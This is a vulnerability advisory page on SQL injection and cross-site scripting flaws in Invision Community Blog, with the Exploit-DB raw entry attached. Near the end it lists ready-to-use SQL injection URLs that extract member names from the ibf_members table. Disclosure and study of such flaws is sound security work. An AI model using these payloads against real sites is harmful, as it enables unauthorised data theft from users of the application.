Multiple Input Validation Vulnerabilities in Invision Community Blog

vendor:

Blog

by:

SecurityFocus

7.5

CVSS

HIGH

Cross-site Scripting and SQL Injection

89, 89, 89, 89

CWE

Product Name: Blog

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Multiple Input Validation Vulnerabilities in Invision Community Blog

Multiple input validation vulnerabilities reportedly affect Invision Community Blog. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to execute unintended commands or queries. Additionally, access to the application should be restricted to trusted users.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13910/info

Multiple input validation vulnerabilities reportedly affect Invision Community Blog. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.

The first issue is a cross-site scripting issue and the second set of issues are SQL injection issues.

An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks. 

SQL Injection
http://www.example.com/index.php?automodule=blog&blogid=1&cmd=editentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/*
http://www.example.com/index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/*
http://www.example.com/index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_members%20WHERE%201/*
http://www.example.com/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2'